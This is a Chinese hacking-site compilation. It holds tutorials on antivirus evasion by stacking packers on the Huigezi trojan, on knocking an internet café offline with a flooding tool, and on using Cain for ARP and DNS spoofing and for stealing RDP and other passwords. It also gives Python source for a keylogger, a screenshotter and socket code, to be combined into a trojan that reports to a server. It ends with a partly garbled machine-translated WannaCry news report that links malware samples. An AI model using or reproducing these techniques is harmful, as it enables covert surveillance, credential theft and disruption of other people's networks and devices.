中国骇客云教大家如何免杀

免杀,一个在黑客界永不过时的话题。从木马和杀毒软件的第一次交锋开始就始终没有中断过,黑客程序开发者和杀毒软件的技术人员的始终在较量着。面对强大的杀毒软件,病毒的免杀就显的尤为重要。免杀的方式基本分为三种:修改特征码、添加花指令和壳,最后一次,危险漫步就来和大家谈谈加壳这种最常见的免杀方式。

有些动植物长着坚硬的外壳,因为它们都着脆弱的身体,需要用坚硬的外壳来保护自己。根据这一理论,一种叫壳的程序出现了。壳诞生的初衷是为了保护自己的程序不被破解和修改,病毒作为一种特殊的程序,壳同样也可以用于病毒的保护。通过这一现象,壳的用途出现了一个翻天覆地的转变。现在提到壳,大家都会想到病毒的免杀。

一般来说,壳分为两种:加密壳和压缩壳。加密壳主要的作用是对程序进行加密,但加密后程序体积会变大。压缩壳主要用于对程序的压缩,能够减小程序的体积。另外,还有一些特殊的壳既可以加密,同时也可以压缩。

加壳不失为一种不错的免杀方式,但随着杀毒软件的普及和病毒库的日益扩大,越来越多的加壳程序被列入病毒的行列。那么我们还能使用这些壳为病毒免杀吗?YES!但我们要稍微动动手脚了。

如果说单一的添加壳,用不了多久就会被杀,人品不行的一下就被主动防御和云查杀给秒了…

我们可以把一些壳混合起来为程序加壳,也就是题目提到的复合加壳,这样也可以起到免杀的效测试才行。

W(%EL[ZASU3CU`%{N[J23QV.png

我以给灰鸽子加壳为例,给大家一个复合加壳的思路。需要注意的是:要加壳的文件不能是RAR格式的,我这里使用的是没有UPX压缩的灰鸽子。先用加密壳加载灰鸽子服务端,我用到的是国外的一款名为“KeyCrypter”。这个壳的免杀效果非常不错,而且功能强大。但要注意的是:尽量选择一些不常见的加壳程序,加壳要保证一定的数量,不能只加一两个壳。

而且加壳后不等于100%免杀,还要靠我们不断分析测试才行。中国骇客云官方网站hackerschina.org

我以给灰鸽子加壳为例,给大家一个复合加壳的思路。需要注意的是:要加壳的文件不能是

RAR格式的,我这里使用的是没有UPX压缩的灰鸽子。先用加密壳加载灰鸽子服务端,我用到的是国外的一款名为“KeyCrypter”。这个壳的免杀效果非常不错,而且功能强大。

简单介绍一下使用方法,左边是选择要加壳的文件,右边是设置输出文件位置。把下面所有的选项全部选上,这些选项的意思是:反编译、反沙盘等等,我们选上就可以了。然后点击“Crypt File”就为灰鸽子加上了加密壳。

现在还不能添加压缩壳,因为每个壳的兼容性都不一样,我们必须进行资源释放处理。下面我们要使用到“FreeRes”。释放资源后选择“功能”中的“建立可编辑资源”对文件进行资源重建。

接下来我们就用到压缩壳,我选用的是“蚂蚁加壳工具和Mini_pack”,因为他们都是压缩壳,经过我测试,这两个壳在压缩时不需要进行资源释放处理。勾好配置后,找到服务端后进行

二次加壳。压缩完毕,用加壳后的灰鸽子过一下瑞星、卡巴和360,都没有报毒。

中国骇客云教你如何攻击网吧(压力测试)我们只上传工具。

尊敬的用户大家好,好长时间没有发布教程了。因为前些时候在网吧玩儿,突发奇想的想攻击网吧进行压力测试,【lol网吧】带宽不足是所有网吧的通病。
首先一些网吧进行了安全组建以及安全模块禁用一些arp嗅探等工具。因为缺少相应的dll,所以一些工具是不能用的,在这里我们提供一些基本的补丁,通杀所有网吧32位64位的dll。下载地址复制一下进行浏览器粘贴。
点我进行下载    cain的内网渗透工具,因为下载好以后根据网吧机器是32或者64进行dll的补丁安装。
以下讲解了cain的使用教程,如果大家在使用中不会请看完本文即可进行深度学习。那天我们攻击网吧的截图和照片没有了(怕网管查到所以没有进行拍照不好意思大家。)
这一步不会可以直接进行跳过看下一步:


内网渗透的一些基本工具用法:
Cain & Abel 是由Oxid.it开发的一个针对Microsoft操作系统的免费口令恢复工具。号称穷人使用的L0phtcrack。它的功能十分强大,可以网络嗅探,网络欺骗,破解加密口令、解码被打乱的口令、显示口令框、显示缓存口令和分析路由协议,甚至还可以监听内网中他人使用VOIP拨打电话。

Abel 是后台服务程序,一般不会用到,我们重点来介绍Cain的使用。

Cain安装:首先我们需要安装Winpcap驱动,

cain内网嗅探工具使用教程 - yes_root - yes_root

一路next便可以安装成功

然后我们就可以使用Cain了,让我们打开传说中的Cain,界面十分简单明了,

cain内网嗅探工具使用教程 - yes_root - yes_root

但是它的功能可就不简单了。

Cain使用:

一、读取缓存密码:切换到“受保护的缓存口令”标签,点上面的那个加号

cain内网嗅探工具使用教程 - yes_root - yes_root

缓存在IE里的密码全都显示出来了。

二、查看网络状况

切换到“网络” 标签,可以清楚的看到当前网络的结构,我还看到内网其他的机器的共享目录,用户和服务,通过上图,我们清楚的看到Smm-DB1开启了IPC$默认共享连接和其他盘隐藏共享。

三、ARP欺骗与嗅探

ARP欺骗的原理是操纵两台主机的ARP缓存表,以改变它们之间的正常通信方向,这种通信注入的结果就是ARP欺骗攻击。ARP欺骗和嗅探是Cain我们用的最多的功能了,切换到“嗅探”标签

cain内网嗅探工具使用教程 - yes_root - yes_root

在这里可以清晰的看到内网中各个机器的IP和MAC地址。

我们首先要对Cain进行配置,先点最单击最上面的“配置”

cain内网嗅探工具使用教程 - yes_root - yes_root

在“嗅探器”中选择要嗅探的网卡,在“ARP(Arp Poison Routing)”中可以伪造IP地址和MAC地址进行欺骗,避免被网管发现

cain内网嗅探工具使用教程 - yes_root - yes_root

在“过滤与端口”中可以设置过滤器,

cain内网嗅探工具使用教程 - yes_root - yes_root

可以根据自己的需要选择过滤的端口,如嗅探远程桌面密码的话,就钩选RDP 3389端口。

小提示:比如我要嗅探上面的61.132.223.10机器,第二个网卡显示我的ip地址为61.132.223.26,和目标机器是同一内网的,就使用第二个的网卡欺骗。

cain内网嗅探工具使用教程 - yes_root - yes_root

单击网卡的那个标志开始嗅探,旁边的放射性标志则是ARP欺骗。

cain内网嗅探工具使用教程 - yes_root - yes_root

cain内网嗅探工具使用教程 - yes_root - yes_root

  嗅探了N久之后,点击下面的 “截获密码”, 嗅探所得到的密码会按分类呈现在大家面前,包括http、ftp、VNC、SMTP、ICQ等密码。如果目标主机使用voip电话的话,还可以获得他使用voip电话的录音(恐怖吧),如图

cain内网嗅探工具使用教程 - yes_root - yes_root

  cain内网嗅探工具使用教程 - yes_root - yes_root  下面我们来进行Arp欺骗,点击下面的“ARP”标签, 

cain内网嗅探工具使用教程 - yes_root - yes_root

 在右边的空白处单击,然后点上面的“加号”,出现“新建ARP欺骗”对话框,在左边选网关,右边选择被欺骗的IP。

这里要注意的是,你的机器性能比网关差的话,会引起被欺骗机器变慢。

1.DNS欺骗:

在“DNS欺骗”中填入请求的DNS名称和响应包的IP地址,

cain内网嗅探工具使用教程 - yes_root - yes_root

如图,当目标地址访问www.hao123.com的时候就自动跳转到Www.google.cn的网站上面,其中的“#resp. 欺骗”就是目标主机被欺骗的次数。

这样对于目标机器进行挂马也不失为一种绝妙的方法。点上面的放射性标志开始Arp欺骗,

小提示:网关IP可以在命令行下输入ipconfig获得

cain内网嗅探工具使用教程 - yes_root - yes_root

如图,网关IP为61.132.223.4

2.远程桌面欺骗:

Cain能够实行中间人攻击(Man-In-The-Middle)远程计算机的终端服务协议(Remote Desktop Protocol RDP)进行截获和解密工作。也就是截获目标主机的3389登陆密码。

cain内网嗅探工具使用教程 - yes_root - yes_root

在“ARP-RDP”里已经得到了3个数据包。右击右边得到的数据包,选择“查看”,

cain内网嗅探工具使用教程 - yes_root - yes_root

我的运气比较好,获得了目标主机登陆3389的用户和密码,如图,用户名为“administrator”密码为“asdf1234”。

小技巧:在肉鸡上对密码进行嗅探的时候,可以按Alt +Delete对界面进行隐藏,按Alt + Page Down隐藏都任务栏,按Alt +Page up呼出界面。这个技巧在内网渗透的时候非常有用!

四、密码的破解

Cain还具有强大的破解功能,可以破解md5,md4,pwl,mssql等加密的密文,我这里示范如何使用Cain破解md5密文。

cain内网嗅探工具使用教程 - yes_root - yes_root

切换到“破解器”标签,在右边空白处单击,按上面的加号,输入我们要解密的32位密文

cain内网嗅探工具使用教程 - yes_root - yes_root

右击要破解的密文,选择“暴力破解”,选择口令长度和密码范围,我这儿选择的是5到6位纯数字密码。

cain内网嗅探工具使用教程 - yes_root - yes_root

按“开始”进行破解

cain内网嗅探工具使用教程 - yes_root - yes_root

一会儿工夫,破解出的密码就出现在我们面前了,哈哈,密码是123456。除了暴力破解以外,你还可以使用通过字典破解和通过rainbow表进行破解。

其他还有一些常用密码的读取可以参照下图

cain内网嗅探工具使用教程 - yes_root - yes_root

使用十分简单,大家自己研究下就行了,密文计算器的效果如图:

cain内网嗅探工具使用教程 - yes_root - yes_root

可以对密文进行md2,md5,lm,nt等方式进行加密

五、追踪路由

切换到“追踪路由”标签,在目标主机中填入目标主机的ip或者域名,我这填www.hackerxfiles.net

cain内网嗅探工具使用教程 - yes_root - yes_root

选择协议和端口,点“开始”,一杯咖啡过后,就可以清晰的看到访问黑X  BBS所经过的所有服务器IP、访问所需的时间和主机名。

另外,Cain还具有“LSA分析”和“嗅探无线网络”等功能,这些功能我们不经常用到,感兴趣的朋友可以自行研究。最新版本cain4.92已经加入vista支持,但是“读取读取缓存密码”功能不是很稳定,如果要读取读取缓存密码的话请使用以前的版本。最后要说一句:Cain的确是一款绝佳的黑界利器,威力无穷,请各位小黑们谨慎使用。


第二步:下载网络超级邻居和p2p网络终结者。
网络超级邻居可以检测内网所有上线主机与共享主机,并且可以进行开放端口检测与服务器主机的检测,具体参考我们的网络超级邻居的使用方法如下:
打开网络超级邻居直接嗅探整个网吧的上线主机,扫描开放端口,135.3389.1433等端口…搜索开放端口的在线主机,共享本机到所有开放主机文件等。
p2p网络终结者可以在百度任意下载,如果缺少部分dll可以添加cain的dll进行安装和使用。
因为网络超级邻居和p2p网络终结者cain的共同性,都可以进行局域网扫描,所以这个就得看个人经验找到相应的服务器主机和安全模块的服务器主机地址了。这里可以使用三个进行经验判断和扫描结果。以后有图了给大家补下。
网络超级邻居下载地址:http://www.crsky.com/soft/2700.html

p2p网络终结者下载地址:http://www.cr173.com/soft/1953.html
因为
这里个软件百度随便一个下载站点都可以下载到,所以如果上面两个软件失效了,请百度一下吧。


第三步:蜗牛攻击器终极版下载地址:https://binghesoft.ctfile.com/file/117068576    这个如果不能使用,百度一下(蜗牛攻击器终极版)|


第四步:打开蜗牛攻击器,p2p网络终结者,网络超级邻居。
蜗牛攻击器输入攻击目标主机:192.168.xxx.xxx
增加蜗牛
切记不要使自己的机器卡死,增加4到5个都可以,模式自己搞。
p2p网络终结者全局控制,黑名单。起到了一定的arp的效果。但不是欺骗。
cain去嗅探主机的账户密码。【这一步不会的话可以使用上面几步】


第五步:等7到8分钟整个网吧会掉线,这里的cain其实没有起到多大的作用,说这个是为了网大家去嗅探一些简单的局域网密码算是一种爆破工具吧~内网扫描工具等。


如果网吧不掉线:两台机器同时攻击.直接秒死…经过测试所有网吧都可以进行秒杀,因为网吧的安全问题和带宽的响应问题..导致网吧直接秒死是正常的………..之前去了网吧做测试..所以没有敢拍照和录像..有机会一定弄,不会的关注我们官方公众微信,进行留言,我们会有专门的客服教你喔~~~

中国骇客云教你使用Python编写木马程序

这次我们运用Python编写一个具有键盘记载、截屏以及通讯功用的简易木马,仍然选用Sublimetext2+JEDI(python自动补全插件)来写代码。首先准备好我们需求的依赖库,pythonhook和pythoncom。

假如觉得费事,你能够直接运用集成了一切我们所需求的python库的商业版Activepython。记载你所敲打的一切:编写一个keylogger说起Keylogger,大家的思想可能早已飞向带有wifi功用的mini小硬件去了。抛开高科技,我们暂且回归实质,探探简易键盘记载器的原理与完成。Pythonkeylogger键盘记载的功用的完成主要应用了pythoncom及pythonhook,然后就是对windowsAPI的各种调用。Python之所以用起来便当快捷,主要归功于这些庞大的支持库,正所谓“人生苦短,快用Python”。关键代码如下所示:

#-*-coding:utf-8-*-fromctypesimport*importpythoncomimportpyHookimportwin32clipboarduser32=windll.user32kernel32=windll.kernel32psapi=windll.psapicurrent_window=None#defget_current_process():#获取最上层的窗口句柄hwnd=user32.GetForegroundWindow()#获取进程IDpid=c_ulong(0)user32.GetWindowThreadProcessId(hwnd,byref(pid))#将进程ID存入变量中process_id="%d"%pid.value#申请内存executable=create_string_buffer("\x00"*512)h_process=kernel32.OpenProcess(0x400|0x10,False,pid)psapi.GetModuleBaseNameA(h_process,None,byref(executable),512)#读取窗口标题windows_title=create_string_buffer("\x00"*512)length=user32.GetWindowTextA(hwnd,byref(windows_title),512)#打印printprint"[PID:%s-%s-%s]"%(process_id,executable.value,windows_title.value)print#关闭handleskernel32.CloseHandle(hwnd)kernel32.CloseHandle(h_process)#定义击键监听事情函数defKeyStroke(event):globalcurrent_window#检测目的窗口能否转移(换了其他窗口就监听新的窗口)ifevent.WindowName!=current_window:current_window=event.WindowName#函数调用get_current_process()#检测击键能否常规按键(非组合键等)ifevent.Ascii>32andevent.Ascii<127:printchr(event.Ascii),else:#假如发现Ctrl+v(粘贴)事情,就把粘贴板内容记载下来ifevent.Key=="V":win32clipboard.OpenClipboard()pasted_value=win32clipboard.GetClipboardData()win32clipboard.CloseClipboard()print"[PASTE]-%s"%(pasted_value),else:print"[%s]"%event.Key,#循环监听下一个击键事情returnTrue#创立并注册hook管理器kl=pyHook.HookManager()kl.KeyDown=KeyStroke#注册hook并执行kl.HookKeyboard()pythoncom.PumpMessages()

【学问点】钩子(Hook):Windows音讯处置机制的一个平台,应用程序能够在上面设置子程以监视指定窗口的某种音讯,而且所监视的窗口能够是其他进程所创立的。编写代码时一定要留意严厉辨别大小写,检查无误后启动keylogger,然后能够尝试翻开记事本写点东西,过程中能够看到我们的keylogger窗口正在对我们的输入实时记载,如图1所示。

<mip-img src=”http://www.weixianmanbu.com/zb_users/upload/2016/07/201607041467631280829472.png” class=”mip-element mip-layout-container mip-img-loaded” style=”margin: 0px; padding: 0px; box-sizing: border-box; display: block; width: 748px; position: relative;”>

图1

切换窗口时会自动跟踪到新窗口,light教授趁机骚扰一下疯狗,能够看到我们的keylogger曾经跟踪到QQ聊天窗口,并忠实的记载下输入的一切,如图2所示。

<mip-img src=”http://www.weixianmanbu.com/zb_users/upload/2016/07/201607041467631289746044.png” class=”mip-element mip-layout-container mip-img-loaded” style=”margin: 0px; padding: 0px; box-sizing: border-box; display: block; width: 748px; position: relative;”>

图2

看看你在干什么:编写一个screenshotter截屏完成起来更简单,直接调用几个GUI相关的API即可,我们直接看代码。

#-*-coding:utf-8-*-importwin32guiimportwin32uiimportwin32conimportwin32api#获取桌面hdesktop=win32gui.GetDesktopWindow()#分辨率顺应width=win32api.GetSystemMetrics(win32con.SM_CXVIRTUALSCREEN)height=win32api.GetSystemMetrics(win32con.SM_CYVIRTUALSCREEN)left=win32api.GetSystemMetrics(win32con.SM_XVIRTUALSCREEN)top=win32api.GetSystemMetrics(win32con.SM_YVIRTUALSCREEN)#创立设备描绘表desktop_dc=win32gui.GetWindowDC(hdesktop)img_dc=win32ui.CreateDCFromHandle(desktop_dc)#创立一个内存设备描绘表mem_dc=img_dc.CreateCompatibleDC()#创立位图对象screenshot=win32ui.CreateBitmap()screenshot.CreateCompatibleBitmap(img_dc,width,height)mem_dc.SelectObject(screenshot)#截图至内存设备描绘表mem_dc.BitBlt((0,0),(width,height),img_dc,(left,top),win32con.SRCCOPY)#将截图保管到文件中screenshot.SaveBitmapFile(mem_dc,'c:\\WINDOWS\\Temp\\screenshot.bmp')#内存释放mem_dc.DeleteDC()win32gui.DeleteObject(screenshot.GetHandle())

运转之后看看效果如何,如图3所示。

<mip-img src=”http://www.weixianmanbu.com/zb_users/upload/2016/07/201607041467631310619179.png” class=”mip-element mip-layout-container mip-img-loaded” style=”margin: 0px; padding: 0px; box-sizing: border-box; display: block; width: 748px; position: relative;”>

图3

综合运用:完成一个简易木马

无论是keylogger记载下的内容,还是screenshotter截获的图片,只存在客户端是没有太大意义的,我们需求构建一个简单server和client端来停止通讯,传输记载下的内容到我们的效劳器上。

1)编写一个简单的TCPclient

#-*-coding:utf-8-*-importsocket#目的地址IP/URL及端口target_host="127.0.0.1"target_port=9999#创立一个socket对象client=socket.socket(socket.AF_INET,socket.SOCK_STREAM)#衔接主机client.connect((target_host,target_port))#发送数据client.send("GET/HTTP/1.1\r\nHOST:127.0.0.1\r\n\r\n")#接纳响应response=client.recv(4096)printresponse

2)编写一个简单的TCPserver

#-*-coding:utf-8-*-importsocketimportthreading#监听的IP及端口bind_ip="127.0.0.1"bind_port=9999server=socket.socket(socket.AF_INET,socket.SOCK_STREAM)server.bind((bind_ip,bind_port))server.listen(5)print"[*]Listeningon%s:%d"%(bind_ip,bind_port)defhandle_client(client_socket):request=client_socket.recv(1024)print"[*]Received:%s"%requestclient_socket.send("ok!")client_socket.close()whileTrue:client,addr=server.accept()print"[*]Acceptconnectionfrom:%s:%d"%(addr[0],addr[1])client_handler=threading.Thread(target=handle_client,args=(client,))client_handler.start()

开启效劳端监听,如图4所示。

<mip-img src=”http://www.weixianmanbu.com/zb_users/upload/2016/07/201607041467631323537986.png” class=”mip-element mip-layout-container mip-img-loaded” style=”margin: 0px; padding: 0px; box-sizing: border-box; display: block; width: 748px; position: relative;”>

<mip-img src=”http://www.weixianmanbu.com/zb_users/upload/2016/07/201607041467631335392821.png” class=”mip-element mip-layout-container mip-img-loaded” style=”margin: 0px; padding: 0px; box-sizing: border-box; display: block; width: 748px; position: relative;”>

执行客户端,如图5所示。

效劳端接纳到客户端的恳求并做出了响应,如图6所示。

<mip-img src=”http://www.weixianmanbu.com/zb_users/upload/2016/07/201607041467631342512153.png” class=”mip-element mip-layout-container mip-img-loaded” style=”margin: 0px; padding: 0px; box-sizing: border-box; display: block; width: 748px; position: relative;”>

图6更多关注www.hackerschina.org

最后需求做的就是把上面三个模块分离起来,一个简易的具有键盘记载、屏幕截图并能够发送内容到我们效劳端的木马就完成了。能够运用py2exe把脚本生成exe可执行文件。当然,你还能够继续发挥,加上远程控制功用。

WannaCry ransomware hit Windows computers worldwide HACKERSCHINA NEWS 4黑色星期五:大规模的勒索攻击以打击全球系统的想哭计算机病毒,“勒索者永恒之蓝”

一个巨大的恶意勒索攻击星期五的头条,首先针对英国医院和西班牙银行在世界范围内迅速蔓延。这个消息是由西班牙电信公司Telefónicaó及时确认,其中的勒索攻击的众多受害者。报纸El Pais报道大量的攻击而在西班牙,ó电信专家确认在其内部的系统已经被病毒感染,增加的情况下的控制。固定和移动电话服务的电话óNICA不被攻击勒索的影响。

西班牙CERT发出一种警告的组织和确认的恶意软件正在迅速蔓延。

《勒索、巴克什想哭(aka Wcry,WanaCrypt,wannacrypt),有针对性的其他许多公司在西班牙和世界各地,包括沃达丰,联邦,和其他关键基础设施。

El Reg报道6 NHS健康信托在英国被恶意软件了。根据Theresa May总理“勒索”削弱了“英国医院、政府代表也证实,情况是由情报机构GCHQ的监控。

NHS面临由于其IT基础设施的陈旧性,还包括大量的运行Windows XP系统的严重问题。

“电脑被锁在Aintree、布莱克浦、埃塞克斯郡布鲁姆菲尔德医院,科尔切斯特总医院,在Derbyshire,大雅茅斯所有的医院系统,东、北赫特福德郡,James Paget Hospital在Norfolk,Lanarkshire,和莱斯特。”报道,埃尔条。

图1–计算机的勒索软件感染想哭

专家从Avast检测安全公司更多超过75000的攻击在99个国家中,大多数的感染的观察在俄罗斯,乌克兰,台湾。

一个实时地图的感染可在以下地址:

https://intel.malwaretech.com/botnet/wcrypt/?t=5m&bid=all

图2–实时感染地图

来源ArsTechnica

一个勒索,利用国家安全局eternalblue和doublepulsar战功

想哭的勒索,利用两NSA利用eternalbluedoublepulsar感染计算机和传播到任何另一个连接Windows系统的威胁,在同一个网络。

从卡巴斯基实验室的研究人员已经证实,想哭”攻击是通过一个smbv2远程执行代码在微软Windows启动。

“重要的是要明白,而未打补丁的Windows计算机暴露他们的SMB服务可以远程攻击的“eternalblue”开发的勒索软件感染的想哭,这个漏洞也存在不足不能防止勒索软件组件的工作。不过,这个漏洞的存在是引起爆发的最重要因素,”卡巴斯基的分析报告

专家强调,网络温暖的能力,允许恶意代码传播迅速。

“这项运动的特殊性是通过利用漏洞公告ms17-010使用描述引起的eternalblue/doublepulsar,可感染其他连接的Windows系统上是不正确的更新相同的网络。一台计算机感染最终会影响整个企业的网络。”国家的西班牙语证书发出安全警报

“勒索,想哭的一个变种,感染机通过加密所有文件,使用前一段允许执行远程命令通过Samba提到的漏洞(SMB),在相同的网络分布到其他Windows机器。”

的doublepulsar后门,允许攻击者注入并执行在目标系统上安装恶意代码;它是利用eternalblue,一个smbv1(服务器消息块1)开发这可能导致在旧版本的Windows的RCE(Windows XP Server 2008 R2)。

想哭的勒索利差通过SMB,它加密的文件在被感染的机器和收费300美元或600美元的比特币恢复。

勒索软件可以加密各种文件在受感染的机器,它也攻击存储在任何附加存储的文件,并把远程桌面访问任何键。恶意软件删除卷快照和禁用修复工具系统将不可能恢复文件。

专家观察恶意软件确定受害者的语言在正确的语言显示赎金要求

在思科塔洛斯团队安全专家已经在想哭勒索公布详细的分析。

在分析出版的专家在该研究小组描述了完整的感染过程如下:

“初始文件和执行文件tasksche.exe mssecsvc.exe滴。杀死开关领域进行检查。其次,服务mssecsvc2.0创建。该服务执行文件mssecsvc.exe比初始执行不同的切入点。本次执法检查被感染的机器,并试图连接到同一子网中的每个IP地址的445端口的TCP IP地址。当恶意软件成功地连接到机器上,启动连接和数据传输。我们相信这是一个利用网络流量负载。它已被广泛报道这是利用最近披露的解决微软在公告的漏洞ms17 – 010。我们目前没有一个完整的理解的SMB流量,到底需要什么条件是它使用这种方法传播。”状态的分析。

“磁盘驱动器上的文件tasksche.exe检查,包括网络共享和移动存储设备映射到一个字母,如“C:”,“/”D:等恶意软件然后检查一个文件扩展名为附录中所列的文件加密使用2048位RSA加密。当文件被加密,恶意软件创建一个新文件目录“Tor”到它下降的tor.exe九DLL文件使用的tor.exe。此外,它滴两个文件:taskdl.exe和taskse.exe。前者删除临时文件,后者推出“wanadecryptor @。exe桌面上向最终用户显示的赎金。“wanadecryptor @ .exe的本身并不是勒索赎金,只。加密是通过tasksche在后台进行。exe”。

专家分析,希望能找到想哭勒索样品在GitHub库:

https://gist.github.com/rain-1/989428fa5504f378b993ee6efbc0b168

该页包含有用的信息,如恶意软件的比特币钱包地址。

勒索指导受害者到一个页面,在btcfrog显示一个QR码,它链接到攻击者的主要的比特币钱包13am4vw2dhxygxeqepohkhsquy6ngaeb94

图3–支付页面显示的QR码

下面的威胁的关键发现:

  • 病毒名称:wannacrypt,想哭,wanacrypt0r,WCrypt,wcry
  • 矢量:如果不打补丁ms-17-010所有Windows版本的Windows 10之前是脆弱的。它采用eternalblue ms17-010传播。
  • 赎金:300美元到600美元之间。有码RM(删除)在病毒文件。似乎复位如果病毒崩溃。
  • 留后门:蠕虫的循环通过系统上的每个RDP会话运行勒索用户。它还安装了doublepulsar后门。它被阴影使回收难。(来源:Malwarebytes)
  • 杀死开关:如果网站www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com是病毒的存在而感染宿主。(来源:Malwarebytes)。这一领域已sinkholed,阻止蠕虫的传播。

解密样品的想哭勒索是可用的在这里

HTTPS:/ / / / cyber1be0b96d502c268cb40da97a16952d89674a9329cb60bac81a96e01cf7356830.exe zhnxr transfer.sh

杀死开关

在大规模攻击的安全专家开始他们的恶意代码分析的野外恶意软件样本的逆向工程几小时后。好消息是,从第一次调查的恶意软件研究人员已经发现了一种杀死开关的勒索软件代码,条件可以阻止代码的执行,当匹配。

道德黑客培训–资源(信息安全)

图4–Kevin Beaumont Tweet杀死开关

英国专家malwaretechblog已经注册了域名后,他们做了一个代码的逆向工程。

杀死开关领域iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com;域名sinkholed执法。在加利福尼亚的一个服务器,和管理员的受感染的系统达到了.com将会收到通知,告诉我们。“从我们的天坑的IP地址已被送往联邦调查局。

图5–杀死开关领域

下面显示当机器试图连接它的消息:

“从我们的天坑的IP地址已被送往联邦调查局和Shadowserver因此受影响的组织应该很快就会得到一个通知,”研究者。信息安全体承认他们注册了域名,然后意识到这是一个总开关。不过,工作了。”

从思科战专家的想哭勒索一个有趣的分析。

“想哭似乎并不只是利用这种攻击框架相关的eternalblue模块;它仅仅是对doublepulsar存在后门扫描服务器。在情况下,它标识一个主机,已经与这个后门植入,它只是利用现有的后门功能,用它来感染系统的想哭”读分析来自Talos。“如果系统尚未被植入doublepulsar,恶意软件将使用eternalblue的SMB漏洞的初步开发。这是蠕虫样活性,已被广泛观察到整个互联网的原因。”

微软已经发布了一个安全顾问对威胁和急救补丁WindowsXP

IT巨头发布急救安全补丁的Windows Server 2003(SP2 x64和x86);Windows XP(SP2 SP3 x64,x86);Windows XP Embedded(SP3,x86);以及Windows 8位和64位版本。

结论

以下几个方面对大规模的勒索攻击必须仔细考虑:

  • 这种攻击演示相关的风险militarization的网络空间。恶意软件,利用代码和黑客工具的情报机构和政府发展是很危险的,失去控制。
  • 该恶意软件的成功是由于那些没有意识到威胁的受害者错误的安全态势,并没有应用安全补丁,微软发布的。
  • 现代的关键基础设施的网络攻击是没有弹性的。
  • WannaCry ransomware hit Windows computers worldwide

    A massive malicious ransomware-based attack made the headlines on Friday, first targeting UK hospitals and Spanish banks before rapidly spreading worldwide. The news was promptly confirmed by the Spanish Telco companies Telefónica, one of the numerous victims of the ransomware attack. The newspaper El Pais also reportedthe massive attack, while experts at Telefónicaconfirmedthe systems in its intranet had been infected, adding that the situation was under control. The fixed and mobile telephone services provided by Telefónica were not been affected by the ransomware-based attack.

    The Spanish CERT issued an alert warning the organizations and confirmed that the malware was rapidly spreading.

    The ransomware, dubbedWannaCry(aka Wcry, WanaCrypt, WannaCrypt), targeted many other companies in Spain and across the world, including Vodafone, FedEx, and other critical infrastructure.

    El Reg reported that 6 NHS health trusts in the UK were taken out by the malware. According to Prime Minister Theresa May, the ransomware “has crippled” UK hospitals, the Government representative also confirmed that the situation was monitored by the intelligence agency GCHQ.

    The NHS faced serious problems due to the antiquated nature of its IT infrastructure that still includes a large number of systems running Windows XP systems.

    “Computers were locked in Aintree, Blackpool, Broomfield Hospital in Essex, Colchester General Hospital, all hospital systems in Derbyshire, Great Yarmouth, East and North Hertfordshire, James Paget Hospital in Norfolk, Lanarkshire, and Leicester.” Reported El Reg.

    Figure 1 – A computer infected by the WannaCry ransomware

    Experts from the security firm Avast detected morethan 75,000 attacksin 99 countries, most of the infections were observed in Russia, Ukraine, and Taiwan.

    A real-time map of the infections is available at the following address:

    https://intel.malwaretech.com/botnet/wcrypt/?t=5m&bid=all

    Figure 2 – Real Time Infections Map

    SourceArstechnica

    A Ransomware that leverages the NSA EternalBlue and DoublePulsar exploits

    The WannaCry ransomware exploits the two NSA exploitsEternalBlueandDoublePulsarto infect computers and propagate the threat to any another connected Windows systems on the same network.

    Researchers from Kaspersky Lab have confirmed that the WannaCry” attack is initiated through an SMBv2 remote code execution in Microsoft Windows.

    “It is important to understand that while unpatched Windows computers exposing their SMB services can be remotely attacked with the “EternalBlue” exploit and infected by the WannaCry ransomware, the lack of existence of this vulnerability doesn’t really prevent the ransomware component from working. Nevertheless, the presence of this vulnerability appears to be the most significant factor that caused the outbreak,” reported the analysis from Kaspersky

    Experts highlighted the network warm capabilities that allow the malicious code to spread rapidly.

    “The special criticality of this campaign is caused by exploiting the vulnerability described in bulletin MS17-010 usingEternalBlue/DoublePulsar, which can infect other connected Windows systems on the same network that are not properly updated. Infection of a single computer can end up compromising the entire corporate network.” states the security alert issued by the Spanish CERT.

    “The ransomware, a variant of WannaCry, infects the machine by encrypting all its files and, using the vulnerability mentioned in the previous paragraph that allows the execution of remote commands through Samba (SMB) and is distributed to other Windows machines in That same network.”

    The DOUBLEPULSAR backdoor allows attackers to inject and execute malicious code on a target system; it is installed by leveraging theETERNALBLUE, an SMBv1 (Server Message Block 1.0)exploitthat could trigger an RCE in older versions of Windows (Windows XP to Server 2008 R2).

    The WannaCry ransomware spreads via SMB, it encrypts the files on the infected machines and charges $300 or $600 in Bitcoin to restore them.

    The ransomware can encrypt a wide variety of documents on the infected machines, it also attacks documents stored on any attached storage, and snatches any keys for remote desktop access. The malware deletes volume snapshots and disables system repair tools to make impossible recovery files.

    Experts observed the malware determine the victim’s language to display a ransom demand in the correct language

    Security experts at CISCO Talos team have published a detailed analysis on the WannaCry ransomware.

    Below the complete infection process described in the analysis published by the experts at the Talos team:

    “An initial file mssecsvc.exe drops and executes the file tasksche.exe. The kill switch domain is then checked. Next, the service mssecsvc2.0 is created. This service executes the file mssecsvc.exe with a different entry point than the initial execution. This second execution checks the IP address of the infected machine and attempts to connect to port 445 TCP of each IP address in the same subnet. When the malware successfully connects to a machine, a connection is initiated, and data is transferred. We believe this network traffic is an exploit payload. It has been widelyreportedthis is exploiting recently disclosed vulnerabilities addressed by Microsoft in bulletinMS17-010. We currently don’t have a complete understanding of the SMB traffic, and exactly what conditions need to be present for it to spread using this method.” states the analysis.

    “The file tasksche.exe checks for disk drives, including network shares and removable storage devices mapped to a letter, such as ‘C:/’, ‘D:/’ etc. The malware then checks for files with a file extension as listed in the appendix and encrypts these using 2048-bit RSA encryption. While the files are being encrypted, the malware creates a new file directory ‘Tor/’ into which it drops tor.exe and nine dll files used by tor.exe. Additionally, it drops two further files: taskdl.exe & taskse.exe. The former deletes temporary files while the latter launches @wanadecryptor@.exe to display the ransom note on the desktop to the end user. The @wanadecryptor@.exe is not in and of itself the ransomware, only the ransom note. The encryption is performed in the background by tasksche.exe.”

    Experts that want to analyze the WannaCry ransomware can findsampleson the following GitHub repository:

    https://gist.github.com/rain-1/989428fa5504f378b993ee6efbc0b168

    the page includes useful information such as the addresses of Bitcoin wallets for the malware.

    The ransomwaredirectsvictims to a page with displaying a QR code at btcfrog, which links to attacker main bitcoin wallet13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94.

    Figure 3 – Payment Page displays QR code

    Below Key findings of the threat:

